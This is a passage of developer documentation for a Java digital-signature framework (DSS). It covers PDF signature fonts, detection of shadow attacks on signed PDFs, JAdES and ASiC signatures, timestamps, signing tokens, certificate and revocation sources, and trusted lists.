of physical fonts, which must be embedded to the produced PDF document. To create an instance of the class, you must pass to a `DSSFileFont` constructor an object of `DSSDocument` type or InputStream of the font file;\n * `DSSJavaFont` for using of logical fonts (default Java fonts). The logical Java fonts allow you to significantly reduce the document size, because these fonts cannot be embedded to the final PDF document. Be aware, because of the fact, using of logical fonts does not allow producing PDF documents satisfying the PDF\/A standard. To create an instance of this class, you should pass as an input a `java.awt.Font` object or target font parameters (name, style, size).\n\nWARNING: Logical fonts may have different implementations depending on a used PAdES Visible signature service or Operating System (OS). 
Keep this in mind when switching an implementation or system environment.\n\nAs well as classes allowing to define native fonts for used implementations (available since DSS 5.7):\n\n * `ITextNativeFont` to be used with `ITextSignatureDrawerFactory`;\n * `PdfBoxNativeFont` to be used with `PdfBoxNativeObjectFactory`.\n\nYou can create a custom font as following (for a physical font):\n\n[source,java,indent=0]\n.Add a custom font as a file\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=font]\n----\n\nFor a logical font:\n\n[source,java,indent=0]\n.Java font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleExistingTest.java[tags=font]\n----\n\nFor a native font:\n\n[source,java,indent=0]\n.Native font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=nativeFont]\n----\n\nBy default, DSS uses a Google font : 'PT Serif Regular' (its physical implementation).\n\nNOTE: 'Native PDFBox Drawer' implementation supports only one of the following fonts: SERIF, SANS-SERIF, MONOSPACED, DIALOG and DIALOG_INPUT.\n\n=== Shadow attack detection\n\n\"Shadow attack\" is a class of attacks on a signed PDF document that constitutes a change of a visual content of a document after the signature has been made. Due to a structure of PDF document, the signature stays cryptographically valid even after the content's modification has been taken place. There are no algorithms to detect the malicious change with 100% guarantee. For more information, please refer to https:\/\/pdf-insecurity.org\/[the website].\n\nSince v5.8, DSS provides a set of own utils to detect the \"shadow attack\" on a signed PDF document. The following algorithms have been introduced:\n\n * `Page amount difference` - the validation tool compares the number of pages between the obtained PDF and signed revision. If the numbers do not match, the validation fail. The validation level can be configured within the <<validationPolicy>> with the constraint `<PdfPageDifference>`.\n * `Annotations overlap` - DSS checks if any annotation overlaps occurred. The overlapping is potentially dangerous, because some annotations can cover a visual content, e.g. forms and signature fields. The validation level can be configured with the constraint `<PdfAnnotationOverlap>`.\n * `Visual difference` - DSS verifies the visual difference between the provided document and signed revision, excluding the newly created annotations (between the validating revisions). The validation level can be configured with the constraint `<PdfVisualDifference>`.\n\n== JAdES signature (JWS)\n\nSince v5.8, DSS includes a possibility of creation and validation of JSON Advanced signatures.\n\nJSON format for AdES Signatures (cf. [R05]) represents an extension of JSON Web Signatures (JWS) as specified in https:\/\/tools.ietf.org\/html\/rfc7515[IETF RFC 7515].\n\nWARNING: The implementation is based on a draft of the standard ETSI TS 119 182-1. 
Some modifications can occur in future releases.\n\nA typical example of a JAdES signature creation is represented below:\n\n[source,java,indent=0]\n.Signing a file with JAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=demo]\n----\n\nThe specific parameters for JAdES signature are described in the next sections.\n\n=== JWS Serialization type\n\nA JWS signature can be represented in different forms which are supported by the JAdES as well:\n\n * `COMPACT_SERIALIZATION` represents a compact, URL-safe serialization. It has no JWS Unprotected Header, therefore only JAdES-BASELINE-B level is possible with the format.\n * `JSON_SERIALIZATION` represents a JSON object with a collection of signatures inside the `signatures` header that allows a parallel signing. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n * `FLATTENED_JSON_SERIALIZATION` represents a JSON object with a single signature container. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n\n[source,java,indent=0]\n.JWS Serialization type usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=serialization]\n----\n\n=== JAdES Signature Packaging\n\nJAdES signatures allow two types of JWS Payload (signed data) inclusion: `ENVELOPING` and `DETACHED`.\n\n==== Enveloping packaging\n\nWith `ENVELOPING` packaging the JWS Payload is enveloped into the JAdES Signature. The type only allows signing one document.\n\n==== Detached packaging\n\nA simple JWS signature allows a `DETACHED` packaging by omitting the JWS Payload in the created signature. For the validation process the detached content shall be provided and it is treated in the same way as attached.\n\nTo create a such signature, the parameter `SigDMechanism.NO_SIG_D` shall be set. The solution allows signing of only one document.\n\nThe JAdES standard [R05] provides a possibility for signing of multiple documents withing one signature in a detached way.\n\nThe following mechanisms are possible:\n\n * `HTTP_HEADERS` is used to sign an HTTP request. The signature may explicitly sign several HTTP headers (represented by the class `HTTPHeader`), as well as the HTTP message body (see the `HTTPHeaderDigest` class).\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism HttpHeaders\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=demo]\n----\n\n * `OBJECT_ID_BY_URI` can be used for signing of multiple documents. The signed files are dereferenced by URIs and their content is concatenated for generation of the JWS Payload.\n\n * `OBJECT_ID_BY_URI_HASH` similarly provides a possibility to sign multiple documents, by signing the computed digests of the original documents. 
The JWS Payload for this format stays empty.\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism ObjectIdByURIHash\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=demo]\n----\n\n=== Base64Url encoding\n\nThe `Base64Url` represents a Base64 encoded format with URI safe alphabet (see https:\/\/tools.ietf.org\/html\/rfc4648[RFC 4648]).\n\nJAdES signatures (as well as JWS) force some values to be Base64Url-encoded, while provides a possibility to customize the format for some of them.\n\nDSS provides options to configure encoding for the following elements:\n\n * JWS Payload can be represented as Base64Url encoded octets (by default), as well as can be present in its initial form (with the protected header `b64` set to `false`).\n\n[source,java,indent=0]\n.Use unencoded JWS Payload\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=unencodedPayload]\n----\n\n * The components of the unsigned header `etsiU` can occur either as Base64Url encoded strings (by default), or as clear JSON objects.\n\nNOTE: All components inside the `etsiU` header shall be present in the same form (Base64Url encoded or as clear JSON).\n\nWARNING: The current version of DSS does not allow JAdES-BASELINE-LTA level creation for `etsiU` components in their clear JSON representation.\n\n[source,java,indent=0]\n.Represent EtsiU components as clear JSON instances\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=clearEtsiU]\n----\n\n== ASiC signature (containers)\n\nWhen creating a digital signature, the user must choose between different packaging elements, namely enveloping, enveloped or detached. This choice is not obvious, because in one case the signature will alter the signed document and in the other case it is possible to lose the association between the signed document and its signature. That's where the standard ETSI EN 319 162 (cf. <<R04>>) offers a standardized use of container forms to establish a common way for associating data objects with advanced signatures or time-stamp tokens.\n\nA number of application environments use ZIP based container formats to package sets of files together with meta-information. ASiC technical specification is designed to operate with a range of such ZIP based application environments. Rather than enforcing a single packaging structure, ASiC describes how these package formats can be used to associate advanced electronic signatures with any data objects.\n\nThe standard defines two types of containers; the first (ASiC-S) allows you to associate one or more signatures with a single data element. In this case the structure of the signature can be based (in a general way) on a single CAdES signature or on multiple XAdES signatures or finally on a single TST; the second is an extended container (ASiC-E) that includes multiple data objects. Each data object may be signed by one or more signatures which structure is similar to ASiC-S. This second type of container is compatible with OCF, UCF and ODF formats.\n\nFor the moment the DSS framework has some restrictions on the containers you can generate, depending on the input file. If the input file is already an ASiC container, the output container must be the same type of container based on the same type of signature. 
If the input is any other file, the output does not have any restriction.\n\n.ASiC containers\n|===\n|Input |Output\n\n|ASiC-S CAdES |ASiC-S CAdES\n\n|ASiC-S XAdES |ASiC-S XAdES\n\n|ASiC-E CAdES |ASiC-E CAdES\n\n|ASiC-E XAdES |ASiC-E XAdES\n\n|Binary |ASiC-S CAdES, ASiC-S XAdES, ASiC-E CAdES, ASiC-E XAdES\n|===\n\nThis is an example of the source code for signing a document using ASiCS-S based on XAdES-B:\n\n[source,java,indent=0]\n.Sign a file within an ASiC-S container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignOneFileWithASiCSBTest.java[tags=demo]\n----\n\nThis is another example of the source code for signing multiple documents using ASiCS-E based on CAdES:\n\n[source,java,indent=0]\n.Sign multiple files within an ASiC-E container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsWithASiCSEWithCAdESTest.java[tags=demo]\n----\n\nPlease note that you need to pass only few parameters to the service. Other parameters, although are positioned, will be overwritten by the internal implementation of the service. Therefore, the obtained signature is always based on CAdES and of DETACHED packaging.\n\nIt is also possible with the framework DSS to make an extension of an ASiC container to the level XAdES-BASELINE-T or -LT.\n\n== Counter signatures\n\nSince v5.8 DSS allows producing of counter signatures according to the corresponding AdES formats.\n\nNOTE: Counter signature does not provide a Proof Of Existence for a signed signature! Use signature extension \/ timestamping for this purpose.\n\nThe following formats are supported for the counter signature creation:\n\n * `XAdES` - multiple, nested and extended counter signatures (up to LTA level) are allowed;\n * `CAdES` - B-level counter signatures are allowed, as well as multiple counter signatures;\n * `JAdES` - multiple, nested and extended signatures (up to LTA level) are allowed;\n * `ASiC` - counter signatures are allowed according to the used format (XAdES or CAdES).\n\nIn order to create a counter signature, the DSS Identifier (or XML Id for XAdES) of the target signature you want to sign shall be provided within the parameters. The example below represents a counter signature creation:\n\n[source,java,indent=0]\n.Counter signature creation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/CounterSignXadesBTest.java[tags=demo]\n----\n\n== Various parameters\n\n[[signaturePolicy]]\n=== Signature policy\n\nWith the new standards the policy handling is linked to -B level. The old -EPES level is not used anymore by the framework. This does not alter the structure of the old signature but only modifies how to control the process of its creation.\n\nThe DSS framework allows you to reference a signature policy, which is a set of rules for the creation and validation of an electronic signature. It includes two kinds of text:\n\n* In a human readable form:\nIt can be assessed to meet the requirements of the legal and contractual context in which it is being applied.\n\n* In a machine processable form:\nTo facilitate its automatic processing using the electronic rules.\n\nIf no signature policy is identified then the signature may be assumed to have been generated or verified without any policy constraints, and hence may be given no specific legal or contractual significance through the context of a signature policy.\n\nThe signer may reference the policy either implicitly or explicitly. 
An implied policy means the signer follows the rules of the policy but the signature does not indicate which policy. It is assumed the choice of policy is clear from the context in which the signature is used and SignaturePolicyIdentifier element will be empty. When the policy is not implied, the signature contains an ObjectIdentier that uniquely identifies the version of the policy in use. The signature also contains a hash of the policy document to make sure that the signer and verifier agree on the contents of the policy document.\n\nThis example demonstrates an implicit policy identifier. To implement this alternative you must set SignaturePolicyId to empty string.\n\n[source,java,indent=0]\n.XAdES with implicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBImplicitPolicyTest.java[tags=demo]\n----\n\nAn XML segment will be added to the signature's qualified and signed properties:\n\ninclude::_samples\/xades-implicit-policy.adoc[]\n\nThe next example demonstrates an explicit policy identifier. This is obtained by setting -B profile signature policy and assigning values to the policy parameters. The Signature Policy Identifier is a URI or OID that uniquely identifies the version of the policy document. The signature will contain the identifier of the hash algorithm and the hash value of the policy document. The DSS framework does not automatically calculate the hash value; it is to the developer to proceed with the calculation using for example java.security.MessageDigest class (rt.jar). It is important to keep the policy file intact in order to keep the hash constant. It would be wise to make the policy file read-only. See also chapter 7 for further information.\n\n[source,java,indent=0]\n.XAdES with explicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified & signed properties (<QualifyingProperties><SignedProperties>):\n\n.XAdES Signature Policy element\ninclude::_samples\/xades-explicit-policy.adoc[]\n\n=== Signature Policy Store\n\nSince v5.8 DSS provides a possibility of incorporation of a Signature Policy Store element as an unsigned property to the existing signature file.\n\nThe following signature formats support the Signature Policy Store addition:\n\n* XAdES (as well as ASiC with XAdES);\n* CAdES (as well as ASiC with CAdES);\n* JAdES.\n\nNOTE: Being an unsigned component the Signature Policy Store is not protected by a digital signature, unlike a Signature Policy Identifier incorporated into the signed properties.\n\nBefore incorporating of a Signature Policy Store, you need to ensure the target signature contains the matching Signature Policy Identifier element (see ch. <<signaturePolicy>>).\n\nAn example of a Signature Policy Store creation is available below:\n\n[source,java,indent=0]\n.Add SignaturePolicyStore\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=addSPS]\n----\n\n=== Trust anchor inclusion policy\n\nIt is possible to indicate to the framework if the certificate related to the trust anchor should be included to the signature or not. 
The setter #setTrustAnchorBPPolicy of the BLevelParameters class should be used for this purpose.\n\nThis rule applies as follows: when -B level is constructed the trust anchor is not included, when -LT level is constructed the trust anchor is included.\n\nNOTE: When trust anchor baseline profile policy is defined only the certificates previous to the trust anchor are included when -B level is constructed.\n\n== Timestamps\n\n=== Timestamp creation\n\nSince DSS 5.6 the framework allows an independent document timestamping (without a signature). The following Document Signature Services support the timestamping :\n\n * `PAdESService` - adds a timestamp to a PDF document;\n * `ASiCWithCAdESService` - creates a timestamped ASiC container with provided documents.\n\n[source,java,indent=0]\n.PDF timestamping\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=creation]\n----\n\n=== Timestamp validation\n\nAs well as a single timestamp creation, DSS provides a validation service for timestamped documents. The timestamp validation process represents \"5.4 Time-stamp validation building block\" (cf. <<R09>>). The validation process is identical to <<signatureValidation>> process. An appropriate validator will be selected automatically. In total, DSS supports timestamp-alone validation for the following file formats:\n\n * Detached CMS timestamp (`DetachedTimestampValidator`) - a detached signed content must be provided (or its digest);\n * PDF document (`PDFDocumentValidator`);\n * ASiC CAdES container with a timestamp (`ASiCWithCAdESTimestampValidator`).\n\nThe validation process can be run with the following inputs :\n\n[source,java,indent=0]\n.Timestamped document validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=validation]\n----\n\nThe produced reports use the same structure as for <<signatureValidation>>.\n\n==== Timestamp qualification\n\nDSS is also able to determine a qualification level of a timestamp, if a relative information about TrustServiceProviders is provided to a certificate verifier (loaded automatically to a trusted certificate source with <<tlValidationJob>>) (cf. <<R14>>).\n\nThree qualification levels are supported by DSS and can be obtained :\n\n * `QTSA` (issued from a granted trust service with TSA\/QTST type at the timestamp production time);\n * `TSA` any other from a known trust anchor;\n * `N\/A` for others.\n\nAn example of a produced Detailed Report you can see below:\n\n.Timestamp Detailed Report\ninclude::_samples\/timestamp-detailed-report-example.adoc[]\n\n== Available implementations of DSSDocument\n\nDSS allows creation of different kinds of DSSDocument : \n\n * `InMemoryDocument` : fully loads in memory. This type of DSSDocument can be instantiated with an array of bytes, an InputStream,...\n * `FileDocument` : refers an existing File\n * `DigestDocument` : only contains pre-computed digest values for a given document. That allows a user to avoid sending the full document (detached signatures). \n \n[source,java,indent=0]\n.DigestDocument\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/DigestDocumentTest.java[tags=demo]\n----\n\n== Management of signature tokens\n\nThe DSS framework is able to create signatures from PKCS#11, PKCS#12 and MS CAPI. Java 6 is inherently capable of communicating with these kinds of KeyStores. 
To be independent of the signing media, DSS framework uses an interface named SignatureTokenConnection to manage different implementations of the signing process. The base implementation is able to sign a stream of the data in one step. That means that all the data to be signed needs to be sent to the SSCD. This is the case for MS CAPI. As to the PKCS#11 and PKCS#12, which give to the developer a finer control in the signature operation, the DSS framework implements the AsyncSignatureTokenConnection abstract class that permits to execute the digest operation and signature operation in two different threads or even two different hardwares.\n\nThis design permits also other card providers\/adopters to create own implementations. For example, this can be used for a direct connection to the Smartcard through Java 6 PC\/SC.\n\n=== PKCS#11\n\nPKCS#11 is widely used to access smart cards and HSMs. Most commercial software uses PKCS#11 to access the signature key of the CA or to enrol user certificates. In the DSS framework, this standard is encapsulated in the class Pkcs11SignatureToken.\n\n[source,java,indent=0]\n.Pkcs11SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS11Snippet.java[tags=demo]\n----\n\n=== PKCS#12\n \nThis standard defines a file format commonly used to store the private key and corresponding public key certificate protecting them by password. \n\nIn order to use this format with the DSS framework you have to go through the class Pkcs12SignatureToken. \n\n[source,java,indent=0]\n.Pkcs12SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS12Snippet.java[tags=demo]\n----\n \n=== MS CAPI\n\nIf the middleware for communicating with an SSDC provides a CSP based on MS CAPI specification, then to sign the documents you can use MSCAPISignatureToken class.\n\n[source,java,indent=0]\n.MSCAPISignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/MSCAPISnippet.java[tags=demo]\n----\n\n=== Other Implementations\n\nAs you can see, it is easy to add another implementation of the SignatureTokenConnection, thus enabling the framework to use other API than the provided three (PKCS#11, PKCS#12 and MS CAPI). For example, it is likely that in the future PC\/SC will be the preferred way of accessing a Smartcard. Although PKCS#11 is currently the most used API, DSS framework is extensible and can use PC\/SC. For our design example we propose to use PC\/SC to communicate with the Smartcard.\n\n== Management of certificates sources\n\nThe validation of a certificate requires the access to some other certificates from multiple sources like trusted lists, trust store, the signature itself: certificates can be contained inside or any other source. \nWithin the framework, an X509 certificate is wrapped through the class:\n\n * `eu.europa.esig.dss.model.x509.CertificateToken`\n \nThis encapsulation helps make certificate handling more suited to the needs of the validation in the context of trust. The framework associates two internal identifiers to the certificate : the DSS Id based on the certificate binary (unique for each certificate) and the Entity Id based on its public key (common to cross-signed certificates).\n\nCertificate tokens are grouped into sources. A certificate token can be declared in several sources. 
The class that models a source is called:\n\n * `eu.europa.esig.dss.spi.x509.CertificateSource`\n \nThis class stores all extracted\/injected certificates for a specific source (Signature, OCSP Response, Trust store, Trusted-list,...). All source types are specified in the enumeration : \n \n * `eu.europa.esig.dss.enumerations.CertificateSourceType`\n \nThis information is used, for example, to distinguish between the certificate from a trusted source and the others. A source has one and only one type, but a certificate token can be found in multiple sources. \nThe DSS framework supplies some standard implementations, but also gives the possibility to implement owner solutions. Among the standard solutions you can find:\n\n * `eu.europa.esig.dss.spi.x509.CommonCertificateSource`\n \nThis is the superclass of almost of the certificate sources. It stores the extracted certificates and implements the common methods from the `CertificateSource` to retrieve certificate(s) by subject, public key, subject key identifier (ski),...\n\nIt also exposes the method CommonCertificateSource#addCertificate which gives the possibility to add manually any CertificateToken as a part of this source.\n\n * `eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource`\n \nThe CommonTrustedCertificateSource is a certificate source for trusted certificates. All added certificates are marked as trust anchors and no revocation data are required for these certificates.\n\n * `eu.europa.esig.dss.validation.SignatureCertificateSource`\n \nThis class and its sub-classes are used to extract and collect certificates from signatures \/ timestamps. It also has methods to retrieve certificates \/ certificate references by their origin (eg : SigningCertificate attribute, DSS Dictionary,...).\n\n * `eu.europa.esig.dss.spi.tsl.TrustedListsCertificateSource`\n \nCertificates coming from the list of Trusted Lists. This class inherits of `CommonTrustedCertificateSource` and gives the mechanism to define the set of trusted certificates (trust anchors). They are used in the validation process to decide if the prospective certificate chain has a trust anchor. See chapter <<tlValidationJob>> to get more information about trusted lists loading (e.g. EU Trusted List).\n\n * `eu.europa.esig.dss.spi.x509.ListCertificateSource`\n \nThis class follows the composite design pattern with a list of CertificateSources. That's used in the validation to retrieve all sources from the signatures \/ timestamps \/ revocation data \/ trusted lists \/... It contains some methods which check over all sources to retrieve certificates or verify if a certificate is trusted.\n\n== Management of CRL and OCSP sources\n\nA CRL is a time-stamped list identifying revoked certificates. It is signed by a Certificate Authority (CA) and made freely available in a public repository. Each revoked certificate is identified in a CRL by its certificate serial number. \n\nThe Online Certificate Status Protocol (OCSP) is an Internet protocol used for obtaining the revocation status of an unique X.509 digital certificate. \n\nFor every certificate, the validity has to be checked via CRL or OCSP responses. The information may originate from different CRLSources or OCSPSources: \nFor easing the usage of such sources, DSS implements a CRLSource and OCSPSource interfaces (which inherit from RevocationSource), which offer a generic, uniform way of accessing CRL and OCSP sources. 
Furthermore, a caching mechanism can be easily attached to those sources, optimizing the access time to revocation information by reducing network connections to online servers.\n\nThe interface CRLSource defines the method which returns CRLToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.CRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo]\n----\n\nThe interface OCSPSource defines the method which returns OCSPToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.OCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo]\n----\n\nWe use these classes during the certificate validation process through \"validationContext\" object (based on ValidationContext class) which is a \"cache\" for one validation request that contains every object retrieved so far. This object in turn instantiates a \"verifier\" based on `RevocationDataLoadingStrategy` class whose role is to fetch revocation data by querying an OCSP or CRL source in the defined order and return the succeeded result.\nIn general, we can distinguish three main sources:\n\n * Offline sources (`OfflineRevocationSource`);\n * Online sources (`OnlineRevocationSource`);\n * Sources with the cache mechanism;\n * List of sources (`ListRevocationSource`) with a collection of several sources.\n \n=== Repository Revocation Source\n\nThe above-mentioned class allows caching of CRL and OCSP responses to a user-chosen source. By default DSS provides a JDBC based implementation for this class, but other implementations also can be created. The class contains a complete set of functions to save revocation data to a database, extract, update and remove it. +\nFurthermore, the `RepositoryRevocationSource` allows the implementer to define a backup revocation source, for the case if the database does not contains the certificate's revocation data yet. +\n\nList of cached Revocation sources implemented in DSS:\n\n * `JdbcRevocationSource`\n ** `JdbcCacheCRLSource`\n ** `JdbcCacheOCSPSource`\n\nThe classes allow the following configuration :\n\n[source,java,indent=0]\n.JdbcCacheCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-cached]\n----\n\nAnd an example for JdbcCacheOCSPSource :\n\n[source,java,indent=0]\n.JdbcCacheOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-cached]\n----\n\nBe aware that you have to initialize a table before start of working with the cached revocation repository.\n\n=== Other implementations of CRL and OCSP Sources\n\nSuch sources find the status of a certificate either from a list stored locally or using the information contained in the advanced signature or online way. Here is the list of sources already implemented in the DSS framework:\n\n * CRL sources\n ** `OfflineCRLSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. 
\n\n=== Other implementations of CRL and OCSP Sources\n\nSuch sources find the status of a certificate either from a locally stored list, from the information contained in the advanced signature, or from an online source. Here is the list of sources already implemented in the DSS framework:\n\n * CRL sources\n ** `OfflineCRLSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and CRL contents are injected by its sub-classes : \n *** `CMSCRLSource` : Extracts CRLs and CRL references from a CMS Signed Data :\n **** `CAdESCRLSource` : Sub-class of `CMSCRLSource` for a CAdES Signature;\n **** `TimestampCRLSource`: Sub-class of `CMSCRLSource` for a Timestamp token (RFC 3161);\n *** `PAdESCRLSource` : Extracts CRLs and CRL references from a PAdES signature.\n *** `XAdESCRLSource` : Extracts CRLs and CRL references from a XAdES signature.\n *** `ExternalResourcesCRLSource` : A class that can instantiate a list of certificate revocation lists from a directory containing the individual lists.\n ** `OnlineCRLSource` : Retrieves CRL files from online sources, using the CRL Distribution Points information from the certificate.\n ** `JdbcCacheCRLSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storing valid CRL entries in a defined `DataSource` and retrieving them locally.\n\n * OCSP sources\n ** `OfflineOCSPSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and OCSP responses are injected by its sub-classes : \n *** `CMSOCSPSource` : Extracts OCSP responses and OCSP references from a CMS Signed Data :\n **** `CAdESOCSPSource` : Sub-class of `CMSOCSPSource` for a CAdES Signature;\n **** `TimestampOCSPSource`: Sub-class of `CMSOCSPSource` for a Timestamp token (RFC 3161);\n *** `PAdESOCSPSource` : Extracts OCSP responses and OCSP references from a PAdES signature.\n *** `XAdESOCSPSource` : Extracts OCSP responses and OCSP references from a XAdES signature.\n *** `ExternalResourcesOCSPSource` : A class that can instantiate a list of OCSPTokens from a directory containing the individual DER-encoded OCSP responses.\n ** `OnlineOCSPSource` : Retrieves OCSP responses from an online source.\n ** `JdbcCacheOCSPSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storing valid OCSP entries in a defined `DataSource` and retrieving them locally.\n\n==== Online CRL Source\n\nThis is a representation of an Online CRL repository. This implementation will contact, using the HTTP protocol, the CRL Responder to download the CRLs from the given URI. Note that the certificate's CRL Distribution Points (CRLDP) extension is used to find the location of the CRL file(s); the URIs of the CRL server(s) are extracted from this extension (OID value: 2.5.29.31).\n\nIt allows the following configuration:\n\n[source,java,indent=0]\n.OnlineCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-online]\n----\n\n==== Online OCSP Source\n\nThis is a representation of an Online OCSP repository. This implementation will contact, using the HTTP protocol, the OCSP Responder to retrieve the OCSP response. Note that the certificate's Authority Information Access (AIA) extension is used to find the issuer's resources location, such as the issuer certificate (CRT file) and\/or the Online Certificate Status Protocol (OCSP) responder.
The URIs of the OCSP server are extracted from this property (OID value: 1.3.6.1.5.5.7.48.1).\n\nIt allows the following configuration:\n\n[source,java,indent=0]\n.OnlineOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-online]\n----\n\n[[certificateVerifier]]\n== CertificateVerifier configuration\n\nThe CertificateVerifier and its implementation CommonCertificateVerifier determine how DSS accesses external resources and how it should react on certain occasions. This configuration is used in both extension and validation mode.\n\n[source,java,indent=0]\n.CertificateVerifier usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CertificateVerifierSnippet.java[tags=demo]\n----\n\n== Trust Anchor(s) configuration\n\nTrust anchors represent an important part of signature creation \/ validation. They define which entities are trusted and which signatures can be trusted,... Do I trust certificates\/signatures from another company \/ country \/ ... ?\n\nSince version 5.6, DSS allows configuring one or more trusted certificate source(s). These sources can be configured from a TrustStore (a kind of keystore which only contains certificates), a trusted list and\/or a list of trusted lists.\n\n[source,java,indent=0]\n.Multiple trusted certificate sources usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=multi-trusted-certificate-sources]\n----\n\n=== Trust store initialization\n\nIf you have a collection of certificates to trust, the easiest way to provide them to DSS is to use a KeyStore \/ TrustStore. \n\n[source,java,indent=0]\n.Trust anchor initialization from a Trust Store\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trust-store]\n----\n\nTo generate the trust store, there is a utility class CreateKeyStoreApp in the dss-cookbook module.\n\n=== Trusted List Certificate Source \n\nIn several countries, a list of Trust Service Providers (TSP) is published. This list is usually published in a machine-processable format (XML) and sometimes in a human-readable format (PDF). A standard (ETSI TS 119 612) exists with the specifications for the XML format. \n\nDSS contains all needed resources to download, parse, validate and interpret the trusted list contents. Since DSS 5.6, it is possible to configure one or more independent trusted list(s) (i.e. not linked to a list of trusted lists) and\/or one or more lists of trusted lists.\n\nIf you want to collect your trusted certificates from trusted list(s), the TrustedListsCertificateSource is required. Loading the trusted list(s) can take some time (connection time-outs, XML parsing, XML validation,...). This process is usually executed in the background. An instance of TrustedListsCertificateSource needs to be created; it will be synchronized with the TLValidationJob.\n\n[source,java,indent=0]\n.Trusted List Certificate Source \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trusted-list-source]\n----\n\n[[tlValidationJob]]\n== TLValidationJob\n\nThe TLValidationJob allows downloading, parsing and validating the Trusted List(s) and Lists Of Trusted Lists (LOTL). Once the task is done, its result is stored in the TrustedListsCertificateSource.
